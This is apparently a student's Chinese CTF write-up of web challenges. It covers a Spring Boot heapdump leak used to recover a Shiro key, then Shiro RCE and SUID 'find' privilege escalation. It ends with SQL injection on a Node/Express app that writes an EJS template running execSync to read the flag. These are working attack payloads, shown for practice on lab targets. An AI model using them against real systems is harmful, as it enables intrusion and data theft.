第五届日月盾杯线下赛 web wp

记一次校赛ctf的web题解。。其实我打的时候一道都没做出来（目移）

签个到吧！

---

签到题也没能做出来的我属实是fw啊。。orz
进入题目后会跳转到一个公网上，有重定向，于是使用curl -v来查看原始响应，即可获得flag

是的就是这样我都没做出来orz，因为我甚至不知道有curl -v这个功能，curl了一下什么都没发现我就没招了，去公网上玩了半天（？），现在一想其实burp抓个包也行啊。。是我不细心了😭

信息搜集

---

进入题目，是一个登陆界面。查看源码，发现关于Thymeleaf的模板的信息，于是就去找关于这个模板的信息，发现Thymeleaf有模板注入漏洞。于是我看了挺久这个Thymeleaf模板注入的内容，最后发现实现不了，甚至是毫无关系（）。

想尝试看报错信息，但是url输个不存在的路径又给我重定向会登录界面了（挠头）。不过根据我看的关于Thymeleaf的内容，用这个的一般是Springboot项目，所以这个网页大概是用Springboot的框架（后来我才发现随便输的路径里加分号之类的符号就可以让它报错，根据报错信息Whitelabel Error Page可以知道是Springboot框架）。

使用SpringBoot Scan工具进行扫描：python SpringBoot-Scan.py -u <ip>,可以发现目标URL存在SpringBoot敏感信息泄露

访问/actuator，可以找到泄露的dump文件，把它丢给claude分析了，可以从里面找到登录密码:

Heapdump 文件（堆转储文件）是 Java 虚拟机（JVM）在运行时生成的内存快照，记录了 JVM 中堆内存的状态，包括对象、类、线程栈和本地变量等信息。

登录进入提示是shiro框架，需要找密钥。

没有其他思路找shiro密钥了，只能回到heapdump文件中寻找。ai分析不出什么了，应该不是直接明文储存的？只能自己深入分析了。用java自带的jvisualvm.exe打开，在类查找org.apache.shiro.web.mgt.CookieRememberMeManager找到shiro的实例类，里面的CipherKey就是我们找的密钥。

写代码把它转换为字符串，运行得到密钥：zFWsRmefIcOKsjDW6d6fiQ==

import base64
import structprint(base64.b64encode(struct.pack('<bbbbbbbbbbbbbbbb', -52,85,-84,70,103,-97,33,-61,-118,-78,48,-42,-23,-34,-97,-119)))

终于拿到shiro密钥了，马上就能命令执行拿到flag了😋。使用shiro漏洞的工具填入密钥，但是竟然检测不出利用链？？

把AES GCM 勾上，再次检测利用链，终于成功进行命令执行。（至于为什么要勾上我也不懂）
在根目录发现flag.txt，cat查看却查看不了，怀疑权限不够。ls / -al查看权限，确实如此

那么现在就是想方法提权了

几种常用的提权方法：sudo提权、suid提权、定时任务提权、内核漏洞提权、/etc/passwd提权

尝试suid提权，使用`find / -perm /4000 -type f`命令查看有哪些命令具有suid权限

很明显我们可以使用find命令进行suid提权。执行find /flag.txt -exec cat {} \，成功读取flag。

题后话：这道题感觉出的挺好的，当时做的时候卡在了找shiro密钥，因为不是直接储存在dump文件里的我不知道怎么找。。但其实网上搜heapdump泄露shiro密钥也能搜出不少教程，是我没做好信息搜集了orz。。。。现在感觉找到了也不一定做的出来，suid提权之类的我还是没学会啊。。。😭

普普通通的登录页面

---

（羊城杯原题，反正我羊城杯的时候也没做出来所以无所谓了（），正好顺便一起复现了😋）

进入题目，依旧是一个登录框。存在sql注入漏洞，但是好像没什么用？随便注册个号进去提示权限不够，应该是要想办法登录管理员，是弱口令username和password（可恶啊羊城杯的时候我根本没猜出来😡）

进入管理员界面，可以发现有一个文件上传和一个文件下载功能，下载功能有一个可以下载的readme.md，里面没有有用的内容。上传功能没写完，访问/upload是报错信息

查看源代码，可以看到存在download路由，且通过filename参数指定下载的文件

根据/download页面的信息可以知道app.js的位置为：/app/app.js,尝试文件包含获取app.js：?filename=/app/app.js，却回显WAF，应该是过滤了/；尝试用多个../回到根目录，也还是WAF。。我们现在大概是在app目录下的某个目录中，那么是否可以返回上级目录到app，再访问其中的app.js？，尝试?filename=../app.js，成功获取到源码：

const express = require('express');
const session = require('express-session');
const sqlite3 = require('sqlite3').verbose();
const path = require('path');
const fs = require('fs');const app = express();
const db = new sqlite3.Database('./db.sqlite'); //数据库路径/*
FLAG in /flag_C404.txt
*/app.use(express.urlencoded({ extended: true }));
app.use(express.static(path.join(__dirname, 'public')));
app.use(session({secret: 'welcometoC404',resave: false,saveUninitialized: true,cookie: { secure: false }
}));app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'ejs'); //使用ejs模板const checkPermission = (req, res, next) => {if (req.path === '/login' || req.path === '/register') return next();if (!req.session.user) return res.redirect('/login');if (!req.session.user.isAdmin) return res.status(403).send('无权限访问');next();
};app.use(checkPermission);app.get('/', (req, res) => {fs.readdir(path.join(__dirname, 'documents'), (err, files) => {if (err) {console.error('读取目录时发生错误:', err);return res.status(500).send('目录读取失败');}req.session.files = files;res.render('files', { files, user: req.session.user });  //渲染views下的files.ejs文件});
});app.get('/login', (req, res) => {res.render('login');
});app.get('/register', (req, res) => {res.render('register');
});app.get('/upload', (req, res) => {if (!req.session.user) return res.redirect('/login');res.render('upload', { user: req.session.user }); //渲染views下的upload.ejs文件//todoing
});app.get('/logout', (req, res) => {req.session.destroy(err => {if (err) {console.error('退出时发生错误:', err);return res.status(500).send('退出失败');}res.redirect('/login');});
});app.post('/login', async (req, res) => {const username = req.body.username;const password = req.body.password;const sql = `SELECT * FROM users WHERE (username = "${username}") AND password = ("${password}")`;db.get(sql,async (err, user) => {if (!user) {return res.status(401).send('账号密码出错！！');}req.session.user = { id: user.id, username: user.username, isAdmin: user.is_admin };res.redirect('/');});
});app.post('/register', (req, res) => {const { username, password, confirmPassword } = req.body;if (password !== confirmPassword) {return res.status(400).send('两次输入的密码不一致');}db.exec(`INSERT INTO users (username, password) VALUES ('${username}', '${password}')`, function(err) {if (err) {console.error('注册失败:', err);return res.status(500).send('注册失败，用户名可能已存在');}res.redirect('/login');});
}); //可以通过db.exec执行sql命令app.get('/download', (req, res) => {if (!req.session.user) return res.redirect('/login');const filename = req.query.filename;if (filename.startsWith('/')||filename.startsWith('./')) {return res.status(400).send('WAF');}if (filename.includes('../../')||filename.includes('.././')||filename.includes('f')||filename.includes('//')) {return res.status(400).send('WAF');}if (!filename || path.isAbsolute(filename) ) {return res.status(400).send('无效文件名');}const filePath = path.join(__dirname, 'documents', filename);if (fs.existsSync(filePath)) {res.download(filePath);} else {res.status(404).send('文件不存在');}
});const PORT = 80;
app.listen(PORT, () => {console.log(`Server running on http://localhost:${PORT}`);
});

先尝试在/register执行sql语句向数据库插入数据：

  username: 1password: 1'); INSERT INTO users (username, password) VALUES ('hack', '123'); --confirmPassword: 1'); INSERT INTO users (username, password) VALUES ('hack', '123'); --

管理员登进去在download下载数据库，找个在线查看sqlite的工具，可以看到我们数据插入成功：

将hacker的is_admin UPDATE为1，使其具有管理员权限

username: 2
password： 2'); UPDATE users SET is_admin = 1 WHERE username = 'hack';--
confirmPassword: 2'); UPDATE users SET is_admin = 1 WHERE username = 'hack';--

如果把ejs恶意模板作为username写入，进入系统会把flag内容回显出来变成“欢迎，(flag内容）”吗？但是不行，不解析，直接返回了。

（这里我还尝试了是否通过sql使用readfile或者writefile来获取flag，但都不行）

既然/uplaod下面的res.render('upload', { user: req.session.user })可以渲染views下的upload.ejs文件,用sql语句创建写了ejs恶意代码的文件到/upload下：

password内写入: admin'); ATTACH '/app/views/upload.ejs' AS mal; CREATE TABLE mal.c(d TEXT); INSERT INTO mal.c VALUES ('<%= global.process.mainModule.require("child_process").execSync("cat /flag_C404.txt") %>'); --
在/upload即可查看到flag：